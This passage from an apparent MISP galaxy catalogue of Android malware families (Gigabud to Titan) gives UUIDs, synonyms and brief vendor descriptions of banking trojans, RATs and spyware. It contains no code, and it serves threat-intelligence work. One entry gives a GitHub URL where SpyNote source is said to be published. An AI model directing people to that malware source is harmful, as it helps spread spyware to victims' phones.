UUID 8f188382-7a31-46a5-83c6-5991dfe739ee which can be used as unique global reference for Gigabud in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ginp

Ginp is a mobile banking software targeting Android devices that was discovered by Kaspersky. The malware is able to steal both user credentials and credit cards numbers by implementing overlay attacks. For this, overlay targets are for example the default SMS application. What makes Ginp a remarkable family is how its operators managed to have it remain undetected over time even and it receiving version upgrades over many years. According to ThreatFabric, Ginp has the following features:

Overlaying: Dynamic (local overlays obtained from the C2) SMS harvesting: SMS listing SMS harvesting: SMS forwarding Contact list collection Application listing Overlaying: Targets list update SMS: Sending Calls: Call forwarding C2 Resilience: Auxiliary C2 list Self-protection: Hiding the App icon Self-protection: Preventing removal Self-protection: Emulation-detection.

Internal MISP references

UUID 77e9ace0-f6e5-4d6e-965a-a653ff626be1 which can be used as unique global reference for Ginp in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GlanceLove

Internal MISP references

UUID 24a709ef-c2e4-45ca-90b6-dfa184472f49 which can be used as unique global reference for GlanceLove in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GnatSpy

Internal MISP references

UUID a3b6a355-3afe-49ae-9f87-679c6c382943 which can be used as unique global reference for GnatSpy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GoatRAT

Internal MISP references

UUID f699d295-1072-418b-8aa2-cb36fbd4c6c7 which can be used as unique global reference for GoatRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Godfather

According to PCrisk, Godfather is the name of an Android malware targeting online banking pages and cryptocurrency exchanges in 16 countries. It opens fake login windows over legitimate applications. Threat actors use Godfather to steal account credentials. Additionally, Godfather can steal SMSs, device information, and other data.

Internal MISP references

UUID 8e95a9d5-08fb-4f11-b70a-622148bd1e62 which can be used as unique global reference for Godfather in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GoldenEagle

Internal MISP references

UUID b7c0c11d-8471-4b10-bbf2-f9c0f30bc27e which can be used as unique global reference for GoldenEagle in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GoldenRAT

Internal MISP references

UUID e111fff8-c73c-4069-b804-2d3732653481 which can be used as unique global reference for GoldenRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GoldDigger

Internal MISP references

UUID 8ff9cde1-627e-4967-8b12-195544f31d83 which can be used as unique global reference for GoldDigger in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

goontact

Internal MISP references

UUID 008ef3f3-579e-4065-ad0a-cf96be00becf which can be used as unique global reference for goontact in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GPlayed

Cisco Talos identifies GPlayed as a malware written in .NET using the Xamarin environment for mobile applications. It is considered powerful because of its capability to adapt after its deployment. In order to achieve this adaptability, the operator has the capability to remotely load plugins, inject scripts and even compile new .NET code that can be executed.

Internal MISP references

UUID 13dc1ec7-aba7-4553-b990-8323405a1d32 which can be used as unique global reference for GPlayed in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Gravity RAT (Android)

Internal MISP references

UUID fed09d31-6378-4e85-b644-5500491dff88 which can be used as unique global reference for Gravity RAT (Android) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GriftHorse

Internal MISP references

UUID fe40a0b2-be48-41c5-8814-7fa3a6a993b9 which can be used as unique global reference for GriftHorse in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Guerrilla

Internal MISP references

UUID 57de6ac2-8cf0-4022-aee2-5f76e3dbd503 which can be used as unique global reference for Guerrilla in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Gustuff

Group-IB describes Gustuff as a mobile Android Trojan, which includes potential targets of customers in leading international banks, users of cryptocurrency services, popular ecommerce websites and marketplaces. Gustuff has previously never been reported. Gustuff is a new generation of malware complete with fully automated features designed to steal both fiat and crypto currency from user accounts en masse. The Trojan uses the Accessibility Service, intended to assist people with disabilities. The analysis of Gustuff sample revealed that the Trojan is equipped with web fakes designed to potentially target users of Android apps of top international banks including Bank of America, Bank of Scotland, J.P.Morgan, Wells Fargo, Capital One, TD Bank, PNC Bank, and crypto services such as Bitcoin Wallet, BitPay, Cryptopay, Coinbase etc. Group-IB specialists discovered that Gustuff could potentially target users of more than 100 banking apps, including 27 in the US, 16 in Poland, 10 in Australia, 9 in Germany, and 8 in India and users of 32 cryptocurrency apps.

Internal MISP references

UUID a5e2b65f-2087-465d-bf14-4acf891d5d0f which can be used as unique global reference for Gustuff in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HARDRAIN (Android)

Internal MISP references

UUID 0caf0292-b01a-4439-b56f-c75b71900bc0 which can be used as unique global reference for HARDRAIN (Android) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HawkShaw

Internal MISP references

UUID 5ae490bd-84ca-434f-ab34-b87bd38e4523 which can be used as unique global reference for HawkShaw in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HenBox

Internal MISP references

UUID 0185f9f6-018e-4eb5-a214-d810cb759a38 which can be used as unique global reference for HenBox in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Hermit

Lookout states that Hermit is an advanced spyware designed to target iOS and Android mobile devices. It is designed to collect extensive amounts of sensitive data on its victims such as their location, contacts, private messages, photos, call logs, phone conversations, ambient audio recordings, and more.

Internal MISP references

UUID b95f25a0-ba22-4320-95e3-323fbf852846 which can be used as unique global reference for Hermit in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HeroRAT

Internal MISP references

UUID 537f17ac-74e5-440b-8659-d4fdb4af41a6 which can be used as unique global reference for HeroRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HiddenAd

HiddenAd is a malware that shows ads as overlays on the phone.

Internal MISP references

UUID 171c97ca-6b61-426d-8f72-c099528625e9 which can be used as unique global reference for HiddenAd in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HilalRAT

RAT, which can be used to extract sensitive information, e.g. contact lists, txt messages, location information.

Internal MISP references

UUID 96bea6aa-3202-4352-8e36-fa05c677c0e8 which can be used as unique global reference for HilalRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Hook

According to ThreatFabric, this is a malware family based on apk.ermac. The name hook is the self-advertised named by its vendor DukeEugene. It provides WebSocket communication and has RAT capabilities.

Internal MISP references

UUID c101bc42-1011-43f6-9d30-629013c318cd which can be used as unique global reference for Hook in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Hydra

Avira states that Hydra is an Android BankBot variant, a type of malware designed to steal banking credentials. The way it does this is by requesting the user enables dangerous permissions such as accessibility and every time the banking app is opened, the malware is hijacking the user by overwriting the legit banking application login page with a malicious one. The goal is the same, to trick the user to enter his login credentials so that it will go straight to the malware authors.

Internal MISP references

UUID ae25953d-cf7c-4304-9ea2-2ea1498ea035 which can be used as unique global reference for Hydra in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

IPStorm (Android)

Android variant of IPStorm (InterPlanetary Storm).

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular IPStorm (Android).

Known Synonyms
`InterPlanetary Storm`

Internal MISP references

UUID dc0c8824-64ac-4ab2-a0e4-955a14ecc59c which can be used as unique global reference for IPStorm (Android) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

IRATA

According to redpiranha, IRATA (Iranian Remote Access Trojan) Android Malware is a new malware detected in the wild. It originates from a phishing attack through SMS. The theme of the message resembles information coming from the government that will ask you to download this malicious application. IRATA can collect sensitive information from your mobile phone including bank details. Since it infects your mobile, it can also gather your SMS messages which then can be used to obtain 2FA tokens.

Internal MISP references

UUID 24fb43b4-d6a6-49c0-a862-4211a245b635 which can be used as unique global reference for IRATA in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

IRRat

Internal MISP references

UUID 3e7c6e8c-46fc-4498-a28d-5b3d144c51cf which can be used as unique global reference for IRRat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

JadeRAT

Internal MISP references

UUID 8804e02c-a139-4c3d-8901-03302ca1faa0 which can be used as unique global reference for JadeRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Joker

Joker is one of the most well-known malware families on Android devices. It manages to take advantage of Google’s official app store with the help of its trail signatures which includes updating the virus’s code, execution process, and payload-retrieval techniques. This malware is capable of stealing users’ personal information including contact details, device data, WAP services, and SMS messages.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Joker.

Known Synonyms
`Bread`

Internal MISP references

UUID aa2ad8f4-3c46-4f16-994b-2a79c7481cac which can be used as unique global reference for Joker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KevDroid

Internal MISP references

UUID 1e1924b5-89cb-408b-bcee-d6aaef7b24e0 which can be used as unique global reference for KevDroid in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KnSpy

Internal MISP references

UUID 084ebca7-91da-4d9c-8211-a18f358ac28b which can be used as unique global reference for KnSpy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Koler

Internal MISP references

UUID 4ff34778-de4b-4f48-9184-4975c8ccc3f3 which can be used as unique global reference for Koler in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Konni (Android)

Internal MISP references

UUID d4f90ffc-72cb-49a5-b796-527785f49161 which can be used as unique global reference for Konni (Android) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KSREMOTE

Internal MISP references

UUID 196d51bf-cf97-455d-b997-fc3e377f2188 which can be used as unique global reference for KSREMOTE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LittleLooter

Internal MISP references

UUID 41cb4397-7ae0-4a9f-894f-47828e768aa9 which can be used as unique global reference for LittleLooter in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Loki

Internal MISP references

UUID a6f481fe-b6db-4507-bb3c-28f10d800e2f which can be used as unique global reference for Loki in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LokiBot

Android banker Trojan with the standard banking capabilities such as overlays, SMS stealing. It also features ransomware functionality. Note, the network traffic is obfuscated the same way as in Android Bankbot.

Internal MISP references

UUID 4793a29b-1191-4750-810e-9301a6576fc4 which can be used as unique global reference for LokiBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LuckyCat

Internal MISP references

UUID 1785a4dd-4044-4405-91c2-efb722801867 which can be used as unique global reference for LuckyCat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Mandrake

Internal MISP references

UUID 0f587654-7f70-43be-9f1f-95e3a2cc2014 which can be used as unique global reference for Mandrake in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Marcher

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Marcher.

Known Synonyms
`ExoBot`

Internal MISP references

UUID f691663a-b360-4c0d-a4ee-e9203139c38e which can be used as unique global reference for Marcher in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MasterFred

According to heimdal, MasterFred malware, this is designed as an Android trojan that makes use of false login overlays to target not only Netflix, Instagram, and Twitter users, but also bank customers. The hackers’ goal is to steal credit card information.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MasterFred.

Known Synonyms
`Brox`

Internal MISP references

UUID 87131ea3-4c5e-42ba-a8e2-edd62a0bcd8d which can be used as unique global reference for MasterFred in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MazarBot

Internal MISP references

UUID 38cbdc29-a5af-46ae-ab82-baf3f6999826 which can be used as unique global reference for MazarBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Medusa (Android)

According to ThreatFabric, this is an Android banking trojan under active development as of July 2020. It is using TCP for C&C communication and targets Turkish banks.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Medusa (Android).

Known Synonyms
`Gorgona`

Internal MISP references

UUID f155e529-dbea-4e4d-9df3-518401191c82 which can be used as unique global reference for Medusa (Android) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Meterpreter (Android)

Internal MISP references

UUID e1ae3e4e-5aaf-4ffe-ba2f-7871507f6d52 which can be used as unique global reference for Meterpreter (Android) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MobileOrder

Check Point has identified samples of this spyware being distributed since 2015. No samples were found on Google Play, meaning they were likely through other channels like social engineering.

Internal MISP references

UUID ee19588f-9752-4516-85f4-de18acfc64b3 which can be used as unique global reference for MobileOrder in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Monokle

Monokle is a sophisticated mobile surveillanceware that possesses remote access trojan (RAT) functionality, advanced data exfiltration techniques as well as the ability to install an attacker-specified certificate to the trusted certificates on an infected device that would allow for man-in-the-middle (MITM) attacks. According to Lookout researchers, It is believed to be developed by Special Technology Center (STC), which is a Russian defense contractor sanctioned by the U.S. Government in connection to alleged interference in the 2016 US presidential elections.

Internal MISP references

UUID 739d6d22-b187-4754-9098-22625ea612cc which can be used as unique global reference for Monokle in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MoqHao

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MoqHao.

Known Synonyms
`Shaoye`
`XLoader`

Internal MISP references

UUID 41a9408d-7020-4988-af2c-51baf4d20763 which can be used as unique global reference for MoqHao in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MOrder RAT

Internal MISP references

UUID f91f27ad-edcd-4e3d-824e-23f6acd81a7b which can be used as unique global reference for MOrder RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Mudwater

Internal MISP references

UUID 9a8a5dd0-c86e-40d1-bc94-51070447c907 which can be used as unique global reference for Mudwater in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MysteryBot

MysteryBot is an Android banking Trojan with overlay capabilities with support for Android 7/8 but also provides other features such as key logging and ransomware functionality.

Internal MISP references

UUID 0a53ace4-98ae-442f-be64-b8e373948bde which can be used as unique global reference for MysteryBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nexus

Internal MISP references

UUID fe0b4e6e-268e-4c63-a095-bf1ddff95055 which can be used as unique global reference for Nexus in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

OmniRAT

Internal MISP references

UUID ec936d58-6607-4e33-aa97-0e587bbbdda5 which can be used as unique global reference for OmniRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Oscorp

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Oscorp.

Known Synonyms
`UBEL`

Internal MISP references

UUID 8d383260-102f-46da-8cc6-7659cbbd9452 which can be used as unique global reference for Oscorp in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PackChat

Internal MISP references

UUID b0f56103-1771-4e01-9ed7-44149e39ce93 which can be used as unique global reference for PackChat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PhantomLance

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PhantomLance.

Known Synonyms
`PWNDROID1`

Internal MISP references

UUID a73375a5-3384-4515-8538-b598d225586d which can be used as unique global reference for PhantomLance in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Phoenix

Internal MISP references

UUID b5d57344-0486-4580-a437-54c61cb0bf4d which can be used as unique global reference for Phoenix in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PhoneSpy

According to Zimperium, PhoneSpy is a spyware aimed at South Korean residents with Android devices.

Internal MISP references

UUID ff00bbb6-6856-4cf5-adde-d1cc536dd0e2 which can be used as unique global reference for PhoneSpy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PINEFLOWER

According to Mandiant, PINEFLOWER is an Android malware family capable of a wide range of backdoor functionality, including stealing system inform information, logging and recording phone calls, initiating audio recordings, reading SMS inboxes and sending SMS messages. The malware also has features to facilitate device location tracking, deleting, downloading, and uploading files, reading connectivity state, speed, and activity, and toggling Bluetooth, Wi-Fi, and mobile data settings.

Internal MISP references

UUID a17a7c5d-0a8f-42e7-b4c9-63c258267776 which can be used as unique global reference for PINEFLOWER in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PixPirate

According to PCrisk, The PixPirate is a dangerous Android banking Trojan that has the capability to carry out ATS (Automatic Transfer System) attacks. This allows threat actors to automatically transfer funds through the Pix Instant Payment platform, which numerous Brazilian banks use.

In addition to launching ATS attacks, PixPirate can intercept and delete SMS messages, prevent the uninstallation process, and carry out malvertising attacks.

Internal MISP references

UUID cdf707bd-a8b0-4ee3-917d-a56b11f30206 which can be used as unique global reference for PixPirate in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PixStealer

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PixStealer.

Known Synonyms
`BrazKing`

Internal MISP references

UUID 5d047596-eb67-4fed-b41d-65fa975150c5 which can be used as unique global reference for PixStealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PjobRAT

Internal MISP references

UUID 6fa6c769-2546-4a5c-a3c7-24dda4ab597d which can be used as unique global reference for PjobRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Podec

Internal MISP references

UUID 82f9c4c1-2619-4236-a701-776c6c781f45 which can be used as unique global reference for Podec in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

X-Agent (Android)

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular X-Agent (Android).

Known Synonyms
`Popr-d30`

Internal MISP references

UUID 0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf which can be used as unique global reference for X-Agent (Android) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Fake Pornhub

Internal MISP references

UUID 3272a8d8-8323-4e98-b6ce-cb40789a3616 which can be used as unique global reference for Fake Pornhub in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/apk.pornhub - webarchive

Associated metadata

Metadata key	Value
type	[]

Premier RAT

Internal MISP references

UUID 661471fe-2cb6-4b83-9deb-43225192a849 which can be used as unique global reference for Premier RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Rafel RAT

Internal MISP references

UUID cdaa0a6d-3709-4e6f-8807-fff388baaba0 which can be used as unique global reference for Rafel RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RambleOn

Internal MISP references

UUID 41ab3c99-297c-465c-8375-3e9f7ce4b996 which can be used as unique global reference for RambleOn in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Rana

Internal MISP references

UUID 65a8e406-b535-4c0a-bc6d-d1bec3c55623 which can be used as unique global reference for Rana in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RatMilad

RatMilad, a newly discovered Android spyware, has been stealing data from mobile devices in the Middle East. The malware is spread through links on social media and pretends to be applications for services like VPN and phone number spoofing. Unwary users download these trojan applications and grant access to malware.

Internal MISP references

UUID 542c3e5e-2124-4c36-af05-65893974d5ce which can be used as unique global reference for RatMilad in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Raxir

Internal MISP references

UUID f5cabe73-b5d6-4503-8350-30a6d54c32ef which can be used as unique global reference for Raxir in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RedAlert2

RedAlert 2 is an new Android malware used by an attacker to gain access to login credentials of various e-banking apps. The malware works by overlaying a login screen with a fake display that sends the credentials to a C2 server. The malware also has the ability to block incoming calls from banks, to prevent the victim of being notified. As a distribution vector RedAlert 2 uses third-party app stores and imitates real Android apps like Viber, Whatsapp or fake Adobe Flash Player updates.

Internal MISP references

UUID e9aaab46-abb1-4390-b37b-d0457d05b28f which can be used as unique global reference for RedAlert2 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RemRAT

Internal MISP references

UUID 23809a2b-3c24-41c5-a310-2b8045539202 which can be used as unique global reference for RemRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Retefe (Android)

The Android app using for Retefe is a SMS stealer, used to forward mTAN codes to the threat actor. Further is a bank logo added to the specific Android app to trick users into thinking this is a legitimate app. Moreover, if the victim is not a real victim, the link to download the APK is not the malicious APK, but the real 'Signal Private Messenger' tool, hence the victim's phone doesn't get infected.

Internal MISP references

UUID 22ef1e56-7778-41d1-9b2b-737aa5bf9777 which can be used as unique global reference for Retefe (Android) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Revive

According to PCrisk, Revive is the name of a banking Trojan targeting Android users (customers of a specific Spanish bank). It steals sensitive information. Cybercriminals use Revive to take ownership of online accounts using stolen login credentials. This malware abuses Accessibility Services to perform malicious activities.

Internal MISP references

UUID 25669934-14bf-463f-bcae-c59c590c3bf8 which can be used as unique global reference for Revive in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Riltok

Internal MISP references

UUID d7b347f8-77a5-4197-b818-f3af504da2c1 which can be used as unique global reference for Riltok in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Roaming Mantis

Internal MISP references

UUID 31d2ce1f-44bf-4738-a41d-ddb43466cd82 which can be used as unique global reference for Roaming Mantis in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Rogue

Internal MISP references

UUID 4b53480a-8006-4af7-8e4e-cc8727c62648 which can be used as unique global reference for Rogue in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Rootnik

Internal MISP references

UUID db3dcfd1-79d2-4c91-898f-5f2463d7c417 which can be used as unique global reference for Rootnik in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Sauron Locker

Internal MISP references

UUID a7c058cf-d482-42cf-9ea7-d5554287ea65 which can be used as unique global reference for Sauron Locker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SharkBot

SharkBot is a piece of malicious software targeting Android Operating Systems (OSes). It is designed to obtain and misuse financial data by redirecting and stealthily initiating money transfers. SharkBot is particularly active in Europe (United Kingdom, Italy, etc.), but its activity has also been detected in the United States.

Internal MISP references

UUID 7b20fdb1-5aee-4f17-a88e-bcd72c893f0a which can be used as unique global reference for SharkBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SideWinder (Android)

SideWinder involved a fake VPN app for Android devices published on Google Play Store along with a custom tool that filters victims for better targeting.

Internal MISP references

UUID af929cac-e0c6-4a63-ac5a-02c4cbbab746 which can be used as unique global reference for SideWinder (Android) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SilkBean

Internal MISP references

UUID 00ab3d3b-dbbf-40de-b3d8-a3466704a1a7 which can be used as unique global reference for SilkBean in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Skygofree

Internal MISP references

UUID f5fded3c-8f45-471a-a372-d8be101e1b22 which can be used as unique global reference for Skygofree in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Slempo

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Slempo.

Known Synonyms
`SlemBunk`

Internal MISP references

UUID d87e2574-7b9c-4ea7-98eb-88f3e139f6ff which can be used as unique global reference for Slempo in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Slocker

Internal MISP references

UUID fe187c8a-25d4-4d30-bd43-efca18d527f0 which can be used as unique global reference for Slocker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SmsAgent

Internal MISP references

UUID ee42986c-e736-4092-a2f9-2931a02c688d which can be used as unique global reference for SmsAgent in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SMSspy

Internal MISP references

UUID 7a38c552-0e1a-4980-8d62-1aa38617efab which can be used as unique global reference for SMSspy in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/apk.smsspy - webarchive

Associated metadata

Metadata key	Value
type	[]

SoumniBot

Internal MISP references

UUID ed53cdaf-0649-4ca5-adcd-592a46f79da8 which can be used as unique global reference for SoumniBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

S.O.V.A.

Internal MISP references

UUID 2aa95661-b63a-432e-8e5e-74ac93b42d57 which can be used as unique global reference for S.O.V.A. in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SpyBanker

Internal MISP references

UUID e186384b-8001-4cdd-b170-1548deb8bf04 which can be used as unique global reference for SpyBanker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SpyC23

Internal MISP references

UUID 8fb4910f-e645-4465-a202-a20835416c87 which can be used as unique global reference for SpyC23 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SpyMax

SpyMax is a popular Android surveillance tool. Its predecessor, SpyNote, was one of the most widely used spyware frameworks.

Internal MISP references

UUID e1dfb554-4c17-4d4c-ac48-604c48d8ab0b which can be used as unique global reference for SpyMax in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SpyNote

The malware has been released on github at https://github.com/EVLF/Cypher-Rat-Source-Code

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SpyNote.

Known Synonyms
`CypherRat`

Internal MISP references

UUID 31592c69-d540-4617-8253-71ae0c45526c which can be used as unique global reference for SpyNote in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

StealthAgent

Internal MISP references

UUID 0777cb30-534f-44bb-a7af-906a422bd624 which can be used as unique global reference for StealthAgent in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Stealth Mango

Internal MISP references

UUID 7d480f11-3de8-463d-8a19-54685c8b9e0f which can be used as unique global reference for Stealth Mango in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Svpeng

Internal MISP references

UUID d99c0a47-9d61-4d92-86ec-86a87b060d76 which can be used as unique global reference for Svpeng in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Switcher

Internal MISP references

UUID e3e90666-bc19-4741-aca8-1e4cbc2f4c9e which can be used as unique global reference for Switcher in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TalentRAT

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TalentRAT.

Known Synonyms
`Assassin RAT`

Internal MISP references

UUID 46151a0d-aa0a-466c-9fff-c2c3474f572e which can be used as unique global reference for TalentRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TangleBot

Internal MISP references

UUID 1e37d712-df02-48aa-82fc-28fa80c92c2b which can be used as unique global reference for TangleBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TeleRAT

Internal MISP references

UUID e1600d04-d2f7-4862-8bbc-0f038ea683ea which can be used as unique global reference for TeleRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TemptingCedar Spyware

Internal MISP references

UUID 982c3554-1df2-4062-8f32-f311940ad9ff which can be used as unique global reference for TemptingCedar Spyware in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ThiefBot

Internal MISP references

UUID 5863d2eb-920d-4263-8c4b-7a16d410ff89 which can be used as unique global reference for ThiefBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TianySpy

According to Trend Micro, this malware appears to have been designed to steal credentials associated with membership websites of major Japanese telecommunication services.

Internal MISP references

UUID 8260dda5-f608-48f2-9341-28dbc5a8e895 which can be used as unique global reference for TianySpy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TinyZ

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TinyZ.

Known Synonyms
`Catelites Android Bot`
`MarsElite Android Bot`

Internal MISP references

UUID 93b27a50-f9b7-4ab6-bb9f-70a4b914eec3 which can be used as unique global reference for TinyZ in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Titan

Internal MISP references

